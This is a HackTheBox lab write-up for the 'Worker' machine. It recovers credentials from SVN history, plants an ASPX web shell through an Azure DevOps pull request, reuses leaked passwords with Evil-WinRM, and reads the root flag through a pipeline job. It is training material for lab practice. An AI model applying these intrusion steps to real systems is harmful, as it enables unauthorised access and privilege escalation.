HackTheBox Worker Writeup -10.10.10.203

Welcome back to Nav1n’s HackTheBox Writeup series. In today’s post I’m going to do the brand new HTB release Worker (10.10.10.203) a medium-rated Windows machine by ekenas.

The initial foothold on this machine will be exploiting the SVNServe and finding the working subdirectory. Enumerating the newly found directory lead us to obtain credential. Login to the portal lets us to create branches, we use this opportunity to upload our shell (aspx shell) and get low level reverse shell

The reverse shell gives us another opportunity to obtain another set of credentials we gain system access using EvilWinRM, and we escalate our privileges to gain System shell using Azure DevOps Pipelines.

Let us see everything in details:

Enumeration: 

As always, I add the machine IP to my hots file as worker.htb. Next, I run the namp scan (nmap -T4 -A -v worker.htb). The scan returns the following result:

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

So we have only two ports are open and listening. A Microsoft IIS on the port 80 and SVNServe on the port 3690 using Apache Subversion.

Webserver enumeration

Upon visiting the webserver, IIS default webpage was loaded.

And checking the port 3690, following text loaded, the source code as well didn’t reveal anything.

I run the WFuzz for sometime but nothing good was discovered. So I decided to move forward. As the SVNServe was seen running on the port 3690 I set my target on the SVNServe.

Enumerating SVNServe

The SVNServe is a custom lightweight server that allows access to Subversion repositories using Subversion’s custom network protocol. The clients can connect SVNServe server by using URLs scheme like svn:// or svn+ssh://. So we can dig in to SVN repositories using the SVN commands. Kali Linux by default have subvision installed, if not this can be installed form repo.

Running the check info command I found repo location, repo UUID, total revisions made, a username “Nathen” and last change date. I think other than the username and repo UUID the rest information is not useful for me.

root@nav1n:~/htb/worker # svn info svn://worker.htb
Path: .
URL: svn://worker.htb
Relative URL: ^/
Repository Root: svn://worker.htb
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 16:52:00 +0300 (Sat, 20 Jun 2020)
root@nav1n:~/htb/worker # 

Checking the logs

First thing first, let us check the logs and see if I could find something.

root@nav1n:~/htb/worker # svn log svn://worker.htb
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 16:52:00 +0300 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 16:50:20 +0300 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 16:46:19 +0300 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 16:45:16 +0300 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 16:43:43 +0300 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------
root@nav1n:~/htb/worker # 

There are 5 revisions made, which I already know and what I don’t know is there is a new Deployment Script has been added. Well, this could be helpful.

Going further with enum the SVN, I started to run the commands found in -help one by one, the command svn list svn://worker.htb lists all the repos available for public view. Upon running the svn list, the command pulls 2 files (dimension.worker.htb/ and moved.txt) . The dimension.worker.htb/ seemed to be a directory and the moved.txt reads as below:

root@nav1n:~/htb/worker # svn list svn://worker.htb
dimension.worker.htb/
moved.txt
root@nav1n:~/htb/worker # svn cat svn://worker.htb/moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
root@nav1n:~/htb/worker # 

Now we found tow more subdirectories.

  • devops.worker.htb
  • dimension.worker.htb

Adding them to hosts file and visiting the page, devops.worker.htb requires an authentication and the dimension.worker.htb loads an HTML5 page.

Since I couldn’t find any hint, I decided to head back to SVN and download the directory. Using the move command let me download the file and the directory in to my local directory.

root@nav1n:~/htb/worker # svn export svn://worker.htb/dimension.worker.htb/
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
--snip--
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
Exported revision 5.
root@nav1n:~/htb/worker #

Checking each folder and files one by one led me nowhere, there is nothing useful inside, could be a rabbit hole. So by the same time someone at HTB hinted to check revisions.

The command checkout can be used to check out a working copy from a repository. Let us see if we could pull out something from the repository – revision by revision. There are total 5 revisions happened so far.

Usage: checkout URL[@REV]… [PATH]

root@nav1n:~/htb/worker # svn -h checkout
checkout (co): Check out a working copy from a repository.
usage: checkout URL[@REV]... [PATH]

  If specified, REV determines in which revision the URL is first
  looked up.

  If PATH is omitted, the basename of the URL will be used as
  the destination. If multiple URLs are given each will be checked
  out into a sub-directory of PATH, with the name of the sub-directory
  being the basename of the URL.

After running checkout command and extracting the changes made to each revision, the only thing I found was, new file (deploy.ps1) a PowerShell script was added.

root@nav1n:~/htb/worker # svn checkout -r 1 svn://worker.htb  
   C dimension.worker.htb
.
.
.
   A dimension.worker.htb/index.html
Checked out revision 1.
root@nav1n:~/htb/worker # svn checkout -r 2 svn://worker.htb  
A    deploy.ps1
Checked out revision 2.
root@nav1n:~/htb/worker # svn checkout -r 3 svn://worker.htb  
U    deploy.ps1
Checked out revision 3.
root@nav1n:~/htb/worker # svn checkout -r 4 svn://worker.htb  
D    deploy.ps1
Checked out revision 4.
root@nav1n:~/htb/worker # svn checkout -r 5 svn://worker.htb  
A    moved.txt
Checked out revision 5.
root@nav1n:~/htb/worker # 

Exporting deploy.ps1

The deploy.ps1 script couldn’t be exported from open export, instead a -force key is required in the command. After exporting the deploy.ps1, I found a credential for the user Nathen, the guy who made revisions.

nathen:wendel98

root@nav1n:~/htb/worker # svn export -r 2 svn://worker.htb/ --force  
A    .
A    deploy.ps1
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt

The only thing so far asked for credential in the worker.htb is http://devops.worker.htb/ I tried the creds on that and successfully logged-in.

The portal opened was a Azure DevOps project dashboard. Going through the app, it didn’t take long for me to understand it’s the similar edition of Git. So there should be a way to create our own branch with malicious code and run it. Since it’s the windows based there are some limitation, but ASPX shell should work here.

Creating a new branch

Creating a new branch is easy as it should be. From the http://devops.worker.htb/ekenas/SmartHotel360/_git/spectral url, I clicked on master –> New branch -“SmartHole”

As the branch is created, next step I should upload my WebShell. My preferred WebShell is Awen WebShell-2.

There were no changes need to be made, just copied the raw script and created my own aspx file called “shell.aspx” and uploaded using the file upload function.

Once uploaded, I add the comment (not required though) and commit it.

And the file upload was confirmed.

Pull Request

From the left menu, I select the “Pull Request” and when the pull request page opens, I clicked the “new Pull Request” button. This opened up a Repo Pull Request page, made sure I selected the right repo (SmartHole) and clicked the Create button.

And from the newly opened the , I clicked Approve and Complete.

Once the pull request is complete, I visit the branch (spectral.worker.htb/shell.aspx and there it goes, my shell is readily waiting for my orders.

I run my listener and from shell, I set up my IP and port and click Connect back Shell and boom, there I have the reverse shell in my listener.

For further enumeration I need a handy tool like WinPeas, so I upload the winPeas.bat to temp directory and run execute it.

Running WinPeas, I found several interesting items, in that I noticed a a mounted Disk W:

Getting User Flag

cd W:
PS W:\> dir
dir


    Directory: W:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos                                                              

PS W:\> cd sites
cd sites
PS W:\sites> dir
dir

    Directory: W:\sites


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-07-20     23:43                alpha.worker.htb                                                      
d-----       2020-07-20     23:43                cartoon.worker.htb                                                    
d-----       2020-04-03     12:27                dimension.worker.htb                                                  
d-----       2020-07-20     23:43                lens.worker.htb                                                       
d-----       2020-07-20     23:43                solid-state.worker.htb                                                
d-----       2020-08-18     21:54                spectral.worker.htb                                                   
d-----       2020-07-20     23:43                story.worker.htb                                                      
d-----       2020-07-20     23:43                twenty.worker.htb                                                     
PS W:\sites> 

Going further, inside the W:\svnrepos\www\conf I found a jackpot – a list of password that says Passwords for SVNServe.


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       2020-06-20     11:29           1112 authz                                                                 
-a----       2020-06-20     11:29            904 hooks-env.tmpl                                                        
-a----       2020-06-20     15:27           1031 passwd                                                                
-a----       2020-04-04     20:51           4454 svnserve.conf                                                         


PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
PS W:\svnrepos\www\conf> 

Finding the real users in the machine matched the password of user robisl:wolves11. Next step, I used Evil-WinRM to login to the machine and got user flag from RobisL’s desktop.

root@nav1n:~/htb/worker # ruby evil-winrm.rb -i worker.htb -u robisl -p wolves11                                    
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> cd /
*Evil-WinRM* PS C:\> cd Users/robisl/Desktop/
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir
    Directory: C:\Users\robisl\Desktop
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-ar---        8/18/2020   9:36 PM             34 user.txt                                                                                                                                                                                                
*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
b9efc951924eeea4d4b31a1040844eb9
*Evil-WinRM* PS C:\Users\robisl\Desktop> 

Privilege Escalation:

User RobisL’s whoami info:

*Evil-WinRM* PS C:\Users\robisl\Desktop> whoami /all

USER INFORMATION
----------------

User Name     SID                                           
============= ==============================================
worker\robisl S-1-5-21-3082756831-2119193761-3468718151-1330


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                            Attributes                                        
====================================== ================ ============================================== ==================================================
Everyone                               Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
WORKER\Production                      Alias            S-1-5-21-3082756831-2119193761-3468718151-1018 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\robisl\Desktop> 

The user is member of Authenticated user, it says he should be able to access Azure DevOps. Upon trying I was successfully logged-in as RobisL.

There is a new project in Robin’s dashboard called “PartsUnlimited”. Going through the Robin’s dashboard, I noticed Robin can run Pipeline Pools with admin privileges. So anything Robin runs in the pipeline that should get executed as System.

Creating A New Pipeline

From Pipelines in the main dashboard, I clicked Create New Pipeline. This opens a new code connection page, I choose Azure Repos Git and from there I chose the current project PartsUnlimited.

In the next step, I was asked to select “Configure your pipeline” where I was provided with several OSes, coding bases to configure my project. I chose “azure-pipelines.yml” which is default coding option with only a couple of lines of codes to execute.

As the Pipeline ready with a default script to be deployed, I just amend two line, I change the pool to Setup and script: type C:\Users\Administrator\Desktop\root.txt

Once I have my script ready, I clicked on Save and run and again a new window opened and I chose to create a new branch and clicked on “Save and run

After a few seconds, I was greeted with below screen:

Now that everything seem to be working, I clicked my script “Run a one-line script” and online-line script loaded and the root flag was read.

Root.txt

That’s it, this is how the machine Worker has been Pwned today. Thank you for your visit and I’m working on last two hardest boxes, my writeup will be live soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

View all posts by Navin →
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Roshan kc
Roshan kc
6 months ago

Bro u have to describe how u got the reverse shell and how to pull the request and i wanna try urs though i got root already and i got confused to get shell for IIS

Francoa
Francoa
5 months ago

HEy nav1n, how did u got the SAM/SYSTEM hashes from admin??

Sorry, that action is blocked.